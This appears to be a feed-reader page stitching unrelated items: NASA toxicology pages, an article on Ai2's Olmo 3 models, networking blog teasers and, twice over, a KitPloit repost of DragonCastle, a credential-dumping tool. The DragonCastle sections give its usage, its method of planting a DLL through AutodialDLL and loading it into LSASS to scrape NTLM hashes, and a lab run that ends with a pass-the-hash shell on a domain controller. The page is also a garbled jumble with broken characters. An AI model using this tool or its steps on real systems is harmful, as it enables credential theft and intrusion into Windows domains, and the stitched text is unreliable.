❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Hazardous Material Summary Tables (HMSTs)

βœ‡NASA Breaking News
By: Ahmed El-Rasheedy
3 December 2025 at 08:39

3 min read

Preparations for Next Moonwalk Simulations Underway (and Underwater)

space toxicologist
A space toxicologist at NASA JSC.
NASA

Hazardous Materials Summary Tables (HMSTs) are a compilation of the chemical, biological, and flammability hazards of materials on a given flight or mission. HMSTs are required by Safety for all Programs, including but not limited to ISS, Commercial Crew Program (CCP), Multi Purpose Crew Vehicle (MPCV), and Gateway. Johnson Space Center (JSC) toxicologists evaluate the toxic hazard level of all liquids, gases, particles, or gels flown on or to any manned U.S. spacecraft. The biosafety hazard level and flammability levels are assigned by JSC microbiologists and materials experts and are documented in an HMST and in a computerized in-flight version of the HMST called the HazMat (Hazardous Materials) database.

How To Obtain Toxicological Hazard Assessments

β€œRequirements for Submission of Data Needed for Toxicological Assessment of Chemical and Biologicals to be Flown on Manned Spacecraft”

  • JSC 27472 (PDF, 766KB) defines the terms β€œchemicals” and β€œbiological materials” as applied to items being flown on or to any U.S. spacecraft. It explains who must submit information to the JSC toxicologists concerning the materials to be flown and specifies what information is needed. It provides schedules, formats, and contact information.
  • Additional US requirements for biological materials can be found on the Biosafety Review Board (BRB) page.
  • Additional US requirements for environmental control and life support (ECLS) assessments can be found in JSC 66869 (PDF, 698KB).

Data Submission

For all flights to ISS and all Artemis requests (Orion, Gateway, Human Lander System (HLS)), please submit data viaΒ the electronic hazardous materials summary table (eHMST) tool. If you do not have access to this tool, please submit a NAMS request for access to JSC – CMC External Tools. Please reference eHMST training for more information

NOTE:Β  For experimental payloads/hardware planned for launch on a Russian vehicle, stowed and/or operated on the Russian Segment of ISS, or planned for return or disposal on a Russian vehicle, we strongly encourage payload providers to submit biological and chemical data to the Russian Institute for Biomedical Problems (moukhamedieva@imbp.ruΒ ORΒ barantseva@imbp.ru).

Hazard Assessments

Toxicological hazard assessments are conducted according toΒ JSC 26895 – Guidelines for Assessing the Toxic Hazard of Spacecraft Chemicals and Test Materials. The resulting Toxicity Hazard Level (THL) in combination with the BioSafety Level (BSL) and Flammability Hazard Level (FHL) form the basis for the combined Hazard Response Level (HRL) used for labeling and operational response per flight rule B20-16.

Share

Details

Last Updated
Dec 03, 2025
Editor
Robert E. Lewis

Toxicology Analysis of Spacecraft Air

βœ‡NASA Breaking News
By: Ahmed El-Rasheedy
3 December 2025 at 08:31

4 min read

Preparations for Next Moonwalk Simulations Underway (and Underwater)

SpaceX Crew-1 uses a GSC en route to the ISS
SpaceX Crew-1 Pilot Victor Glover and Mission Specialist Shannon Walker work with a Grab Sample Container (GSC) in the SpaceX Crew Dragon Resilience spacecraft while en route to the ISS.
NASA

Toxicology and Environmental Chemistry (TEC) monitors airborne contaminants in both spacecraft air and water. In-flight monitors are employed to provide real-time insight into the environmental conditions on ISS. Archival samples are collected and returned to Earth for full characterization of ISS air and water.

Real-time in-flight air analytical instruments include the Air Quality Monitors (AQM), carbon dioxide (CO2Β monitors), and a compound specific analyzer for combustion products (CSA-CP). Real-time in-flight water monitoring capabilities include the colorimetric water quality monitoring kit (CWQMK) and the ISS total organic carbon analyzer (TOCA).

Post-flight analyses are performed on archival samples of spacecraft air and water obtained at specific times and locations during a mission. Air archival samples are collected using β€œgrab sample containers” (GSC) and formaldehyde badges. The U.S. and Russian water recovery systems on the ISS process atmospheric moisture (U.S. and Russian systems) and urine distillate (U.S. system only) into clean, potable water for the crew to use. Β The Water Kit is utilized to collect archival samples of the potable water and are routinely returned to the ground to monitor the quality of the water produced by the systems. Β Samples of condensate and wastewater are also collected and returned to check for the presence of contaminants that could break through the water recovery systems.Β  Β 

Results of Post-Flight Analysis of In-Flight Air SamplesΒ Β (Most Recent First)

Β Β  Β 

Share

Details

Last Updated
Dec 04, 2025
Editor
Robert E. Lewis
Keep Exploring

Discover More Topics From NASA

LSAH Newsletter

βœ‡NASA Breaking News
By: Ahmed El-Rasheedy
25 November 2025 at 16:20

1 min read

Preparations for Next Moonwalk Simulations Underway (and Underwater)

Reid Wiseman in the station’s Destiny lab.
Reid Wiseman finds a little peace and quiet in the station’s Destiny lab.
NASA

The Lifetime Surveillance of Astronaut Health (LSAH) program collects, analyzes, and interprets medical, physiological, hazard exposure, and environmental data for the purpose of maintaining astronaut health and safety as well as preventing occupationally induced injuries or disease related to space flight or space flight training. It allows NASA to effectively understand and mitigate the long-term health risks of human spaceflight, as well as support the physical and mental well-being of astronauts during future exploration missions.

The LSAH Newsletter serves to inform and update former astronauts on how their medical data is being utilized by the LSAH team. It is published and distributed bi-annually.

+ October 2025 | Vol 30 Issue 2 – LSAH Newsletter

+ Past LSAH Newsletters and Publications

Share

Details

Last Updated
Nov 25, 2025
Editor
Robert E. Lewis

Ai2 releases Olmo 3 open models, rivaling Meta, DeepSeek and others on performance and efficiency

βœ‡GeekWire
By: Todd Bishop
20 November 2025 at 10:15
GeekWire Photo / Todd Bishop

The Allen Institute for AI (Ai2) released a new generation of its flagship large language models, designed to compete more squarely with industry and academic heavyweights.

The Seattle-based nonprofit unveiled Olmo 3, a collection of open language models that it says outperforms fully open models such as Stanford’s Marin and commercial open-weight models like Meta’s Llama 3.1.

Earlier versions of Olmo were framed mainly as scientific tools for understanding how AI models are built. With Olmo 3, Ai2 is expanding its focus, positioning the models as powerful, efficient, and transparent systems suitable for real-world use, including commercial applications.

β€œOlmo 3 proves that openness and performance can advance together,” said Ali Farhadi, the Ai2 CEO, in a press release Thursday morning announcing the new models.

It’s part of a broader evolution in the AI world. Over the past year, increasingly powerful open models from companies and universities β€” including Meta, DeepSeek, Qwen, and Stanford β€” have started to rival the performance of proprietary systems from big tech companies.

Many of the latest open models are designed to show their reasoning step-by-step β€” commonly called β€œthinking” models β€” which has become a key benchmark in the field.

Ai2 is releasing Olmo 3 in multiple versions: Olmo 3 Base (the core foundation model); Olmo 3 Instruct (tuned to follow user directions); Olmo 3 Think (designed to show more explicit reasoning); and Olmo 3 RL Zero (an experimental model trained with reinforcement learning).

Open models have been gaining traction with startups and businesses that want more control over costs and data, along with clearer visibility into how the technology works.Β 

Ai2 is going further by releasing the full β€œmodel flow” behind Olmo 3 β€” a set of snapshots showing how the model progressed through each stage of training. In addition, an updated OlmoTrace tool will let researchers link a model’s reasoning steps back to the specific data and training decisions that influenced them.

In terms of energy and cost efficiency, Ai2 says the new Olmo base model is 2.5 times more efficient to train than Meta’s Llama 3.1 (based on GPU-hours per token, comparing Olmo 3 Base to Meta’s 8B post-trained model). Much of this gain comes from training Olmo 3 on far fewer tokens than comparable systems, in some cases six times fewer than rival models.

Among other improvements, Ai2 says Olmo 3 can read or analyze much longer documents at once, with support for inputs up to 65,000 tokens, about the length of a short book chapter.

Founded in 2014 by the late Microsoft co-founder Paul Allen, Ai2 has long operated as a research-focused nonprofit, developing open-source tools and models while bigger commercial labs dominated the spotlight. The institute has made a series of moves this year to elevate its profile while preserving its mission of developing AI to solve the world’s biggest problems.

In August, Ai2 was selected by the National Science Foundation and Nvidia for a landmark $152 million initiative to build fully open multimodal AI models for scientific research, positioning the institute to serve as a key contributor to the nation’s AI backbone.Β 

It also serves as the key technical partner for the Cancer AI Alliance, helping Fred Hutch and other top U.S. cancer centers train AI models on clinical data without exposing patient records.

Olmo 3 is available now on Hugging Face and Ai2’s model playground.

How to Find the Cause of Packet Loss in Your Network

βœ‡Paessler Blog
By: Mike Payne
7 November 2025 at 04:00

When users complain of dropped video calls, stuttering applications, or files that won't upload properly, 90% of the time you can probably blame packet loss. It's one of those network performance issues that make you feel like the whole network is shot, even when your equipment is fine.

Mobile Network Performance Monitoring: Essential Strategies for Optimal Connectivity

βœ‡Paessler Blog
By: michael.becker@paessler.com (Michael Becker)
13 October 2025 at 03:59

In the hyperconnected world, mobile network performance monitoring is crucial for staying online and never missing a beat. With the widespread adoption of mobile networks for business activities, it is vital to understand how to monitor network performance to avoid downtime, high latency, and overall interruptions.

Improve End-to-End Visibility With Network Segment Analysis

βœ‡Exoprise
By: Simon Dion
19 September 2024 at 13:11
Network Segment Analysis

With the digital landscape today, maintaining seamless connectivity is a priority for most organizations. However, Internet Service Providers (ISPs), the Internet, and Software-Defined Wide Area Network (SDWAN) performance issues can severely impact operations, frustrate end-users, and can be costly when downtime occurs. Having recognized these challenges organizations face, we are excited to introduce our newest…

The post Improve End-to-End Visibility With Network Segment Analysis appeared first on Exoprise.

What Customers Love About Exoprise

βœ‡Exoprise
By: Brad Saville
12 July 2024 at 08:38
What Customers Love About Exoprise

At Exoprise, we always listen to customers’ input and ensure they have the best experience possible. Our customer success, support, and engineering teams have been hard at work, collecting this feedback and insights to identify the functionality and features loved by our customers. Today, we’ll be sharing the top five favorites that have been brought…

The post What Customers Love About Exoprise appeared first on Exoprise.

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process

βœ‡KitPloit
By: Unknown
19 January 2023 at 06:30


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -h                                                                                                                                            
		DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password (if omitted, it will be asked unless -no-pass)
  -d DOMAIN, --domain DOMAIN
                        valid doma   in name
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes (LM hash can be empty)
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
  -local-dll dll to plant
                        DLL location (local) that will be planted on target
  -remote-dll dll location
                        Path used to update AutodialDLL registry value</   pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
		DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

		============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977   b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 

		============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                            Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivile   ge                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               En   able computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel FernΓ‘ndez (@TheXC3LL)

References



Linux Lostat Command

βœ‡HackNos
By: Rahul Gehlaut
5 August 2021 at 05:19

About Linux iostat command. TheΒ Linux iostat command is used for monitoring systemΒ enter/outputΒ machineΒ loading by observing the time theΒ gadgetsΒ areΒ actionsΒ associatedΒ with theirΒ commonΒ switchΒ charges. The Linux iostat command ...

Read more

The post Linux Lostat Command appeared first on HackNos.

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process

βœ‡KitPloit
By: Zion3R
19 January 2023 at 06:30


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -h                                                                                                                                            
		DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password (if omitted, it will be asked unless -no-pass)
  -d DOMAIN, --domain DOMAIN
                        valid doma   in name
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes (LM hash can be empty)
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
  -local-dll dll to plant
                        DLL location (local) that will be planted on target
  -remote-dll dll location
                        Path used to update AutodialDLL registry value</   pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
		DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

		============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977   b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 

		============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                            Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivile   ge                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               En   able computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel FernΓ‘ndez (@TheXC3LL)

References



❌
❌